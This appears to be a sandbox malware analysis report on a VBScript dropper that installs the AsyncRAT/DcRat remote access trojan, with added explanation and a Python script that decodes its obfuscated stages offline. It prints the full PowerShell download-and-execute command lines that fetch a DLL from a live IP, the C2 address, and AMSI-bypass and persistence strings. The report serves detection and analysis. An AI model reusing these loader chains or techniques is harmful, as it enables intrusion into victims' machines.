
Windows Analysis Report
sostener.vbs

Overview

General Information

Sample name: sostener.vbs
Analysis ID: 1523124
MD5: 640864bd8dcc33f7191cea6e8794a386
SHA1: 6b651ed9e576d72b6c53e975e555572701fe2681
SHA256: 5b30c27eaca00c51aa594df7273f8e24d84d08a6c085147697e21b082e3e7812
Tags: user-lontze7

Detection

AsyncRAT, DcRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Yara detected DcRat
Yara detected Powershell download and execute
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5332 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3848 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4312 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • RegSvcs.exe (PID: 6884 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
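The two PowerShell stages in the tree above are where the wrapper is undone. Stage 1 (PID 3848) holds a base64 string in which every 'A' was swapped for a space, so no long base64 run is visible in the command line; it puts the 'A's back, base64-decodes to UTF-16LE, substitutes the placeholder %pzAcOgInMr% with the script's own path and runs the result. Stage 2 (PID 4312) is what comes out, and it hands the next download URL to the fetched DLL reversed ('...//:ptth'), which is why the DLAgent09 YARA rule matches on '//:ptth' and 'StrReverse'. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it reproduces the unwrap, checks whether a captured string is intact, extracts plain and reversed URLs from the result, and decodes the padding-less base64 fragments the YARA rules report. The stage-2 text it encodes is the PID 4312 command line with the placeholder restored, constructed here so the round trip runs offline. One caveat the code makes explicit: HTML rendering collapses runs of spaces, so the $ExeNy string as printed on this page has lost the second space of every 'AA' pair (the true encoding of "$qkvwr = '0'" begins 'J Bx Gs dgB3 HI I  9 C  Jw', with two spaces where the page shows one) and cannot be decoded as printed. Take the raw command line from the process-creation event (Sysmon Event ID 1 or Security 4688) instead.

```python
import base64
import binascii
import re

# Second-stage command line from the report (PID 4312), with the %pzAcOgInMr%
# placeholder as stage 1 leaves it before substitution. Constructed here so the
# example runs offline; nothing is fetched.
STAGE2 = (
    "$qkvwr = '0';$iaquc = '%pzAcOgInMr%';[Byte[]] $ywjdh = [system.Convert]::"
    "FromBase64String( (New-Object Net.WebClient).DownloadString("
    "'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));"
    "[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1')"
    ".GetMethod('ZxKHG').Invoke($null, [object[]] ("
    "'txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));"
)

# The first 60 characters of $ExeNy exactly as this page renders them (whitespace collapsed).
PAGE_EXENY_PREFIX = "J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU"


def wrap_like_stage1(script: str) -> str:
    """Apply the sample's transform: UTF-16LE, base64, then every 'A' becomes a space."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii").replace("A", " ")


def unwrap_stage1(blob: str, script_path: str = "C:\\Users\\user\\Desktop\\sostener.vbs"):
    """Reverse wrap_like_stage1 and fill in the placeholder the way stage 1 does.

    Returns (ok, text). ok=False means the blob is damaged and text holds the reason;
    a blob whose 'AA' runs were collapsed to one space fails one of these checks.
    """
    b64 = blob.replace(" ", "A")
    if len(b64) % 4:
        return False, f"base64 length {len(b64)} is not a multiple of 4 (spaces collapsed?)"
    try:
        raw = base64.b64decode(b64, validate=True)
    except binascii.Error as exc:
        return False, f"invalid base64: {exc}"
    if len(raw) % 2:
        return False, "odd byte count, not UTF-16LE (spaces collapsed?)"
    text = raw.decode("utf-16-le", errors="replace")
    if not (text.isascii() and all(c.isprintable() or c in "\r\n\t" for c in text)):
        return False, "decoded text is not printable ASCII, blob is corrupted"
    return True, text.replace("%pzAcOgInMr%", script_path)


URL_RE = re.compile(r'''https?://[^\s'"()]+''')
REVERSED_URL_RE = re.compile(r'''[^\s'"()]+//:s?ptth''')


def extract_urls(script: str) -> list:
    """Collect forward URLs plus reversed ones (the StrReverse trick DLAgent09 keys on)."""
    urls = URL_RE.findall(script)
    urls += [m[::-1] for m in REVERSED_URL_RE.findall(script)]
    return urls


def decode_b64_artifact(s: str) -> str:
    """Decode a base64 string the way YARA reports it: padding is often cut off, so restore it."""
    s = s + "=" * (-len(s) % 4)
    return base64.b64decode(s).decode("utf-8", errors="replace")


if __name__ == "__main__":
    ok, stage2 = unwrap_stage1(wrap_like_stage1(STAGE2))
    print(ok, extract_urls(stage2))
    print(unwrap_stage1(PAGE_EXENY_PREFIX))
    for art in ("QW1zaVNjYW5CdWZmZXI", "VmlydHVhbFByb3RlY3Q",
                "U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=="):
        print(decode_b64_artifact(art))
```

Run on an intact capture, unwrap_stage1 yields the PID 4312 command line and extract_urls returns both the stage-2 download (F3dll.txt) and the reversed URL the DLL receives, http://91.202.233.169/Tak/Reg/Marz/ENVS/DJ1.txt, which is the indicator that does not appear anywhere in plain form. Run on the page-rendered prefix it refuses with an odd-byte-count error rather than emitting garbage.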
Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name: DCRat
Description: DCRat is a typical RAT that has been around since at least June 2019.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
Malware configuration as extracted by the sandbox:
{"Server": ")8\"zc", "Ports": "$A<IlE,84,7;&gV", "Version": "*wacp!]6l[e", "BDOS": "U^2", "AES_key": "R4OsSR16j3MjPEBlkfzyOGTLnlxVVuwW", "Mutex": "n#QO", "Certificate": "UDq5O^", "ServerSignature": "1", "Group": "Oy\\iql0S13XbS4sp1@PsWg:PGIw'~?Q;ifHa#3ef8L\"SpWzk,&&}s;$/?J9UH3>j3={V'nCn.PI*|e>4&k2[2Y\"w$T+^X_j9HSG[?b*'54eS5e_~(e#Z\"n,TX*T->_qfnrv]TM^:Sm1uBPI9|\\4a^^?R|av{V =9J2E|^{wS7Zq,=)a;uL uRaE\"K5bW ycl@NpcoGBww~DzGBkD+U1vws!$\"Awn}G}9cJ6;M^g4xsh'`s^(KX%.#m`^wc.Syd?~c\"Lsj>]?`qx7a!]~a7*CV\\/w6F+j0{&]M*&[7-]2Y</uTKz[gT&GM", "AntiProcess": "HB!<i[>IoEHueVuN1#fc!@?Z#TsdM.i5RX/xjjmOH +NC,v <85~NN!Z.)uebFY`", "PasteBin": "FLVl;"}
Only AES_key came out readable. Server, Ports, Mutex, Group, AntiProcess and the remaining fields are unprintable, which points to the config decryption not having fully succeeded rather than to real values, so the C2 endpoint should be taken from the network observations below (89.117.23.22 on TCP/4455, flagged by Suricata as C2 traffic) rather than from this block.
Source | Rule | Description | Author | Strings
dump.pcap | Windows_Trojan_DCRat_1aeea1ac | unknown | unknown
  • 0x564a7:$b2: DcRat By qwqdanchun1
Source | Rule | Description | Author | Strings
00000003.00000002.1707124383.000001851CFD0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
00000003.00000002.1707124383.000001851CFD0000.00000004.08000000.00040000.00000000.sdmp | MALWARE_Win_DLAgent09 | Detects known downloader agent | ditekSHen
  • 0x16fd:$h1: //:ptth
  • 0xfc1:$s1: DownloadString
  • 0xe27:$s2: StrReverse
  • 0xfb0:$s3: FromBase64String
  • 0x1237:$s4: WebClient
00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_DCRat_1aeea1ac | unknown | unknown
  • 0x63fb:$a1: havecamera
  • 0x98ec:$a2: timeout 3 > NUL
  • 0x990c:$a3: START "" "
  • 0x9797:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g (base64 of "/c schtasks /create /f /sc onlogon /rl highest /tn ")
  • 0x984c:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== (base64 of "SOFTWARE\Microsoft\Windows\CurrentVersion\Run\")
00000004.00000002.2958714804.000000000148B000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_DCRat_1aeea1ac | unknown | unknown
  • 0x1700:$b2: DcRat By qwqdanchun1
  • 0x7064:$b2: DcRat By qwqdanchun1
(14 entries in the full report; only the first are shown here.)
The leading number in each dump name is the analysed process index, not the PID: process 3 is one of the powershell.exe instances (its dump carries the downloader DLL's strings) and process 4 is RegSvcs.exe (PID 6884), whose memory holds the RAT body.
Source | Rule | Description | Author | Strings
3.2.powershell.exe.1851cfd0000.4.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
3.2.powershell.exe.1851cfd0000.4.raw.unpack | MALWARE_Win_DLAgent09 | Detects known downloader agent | ditekSHen
  • 0x16fd:$h1: //:ptth
  • 0xfc1:$s1: DownloadString
  • 0xe27:$s2: StrReverse
  • 0xfb0:$s3: FromBase64String
  • 0x1237:$s4: WebClient
4.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
4.2.RegSvcs.exe.400000.0.unpack | Windows_Trojan_DCRat_1aeea1ac | unknown | unknown
  • 0x65fb:$a1: havecamera
  • 0x9aec:$a2: timeout 3 > NUL
  • 0x9b0c:$a3: START "" "
  • 0x9997:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g (base64 of "/c schtasks /create /f /sc onlogon /rl highest /tn ")
  • 0x9a4c:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== (base64 of "SOFTWARE\Microsoft\Windows\CurrentVersion\Run\")
4.2.RegSvcs.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_B64_Artifacts | Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. | ditekSHen
  • 0x9a4c:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA (the same Run key, matched without its padding)
  • 0x9997:$s2: L2Mgc2NodGFza3MgL2 (prefix of the schtasks command above)
  • 0x9916:$s3: QW1zaVNjYW5CdWZmZXI (base64 of "AmsiScanBuffer")
  • 0x9964:$s4: VmlydHVhbFByb3RlY3Q (base64 of "VirtualProtect")
(16 entries in the full report; only the first are shown here.)
The image unpacked from RegSvcs.exe at base 0x400000 is the RAT itself, consistent with the "Injects a PE file into a foreign processes" and "Creates a process in suspended mode" signatures. The AmsiScanBuffer and VirtualProtect pair is typical of an in-memory AMSI patch (make the function writable, then overwrite its prologue), and the schtasks /sc onlogon and Run-key strings are the persistence options these families carry.
Source | Rule | Description | Author | Strings
amsi64_4312.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 
d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 
QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadSt
            Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 89.117.23.22, DestinationIsIpv6: false, DestinationPort: 4455, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 6884, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49737
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 
d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, 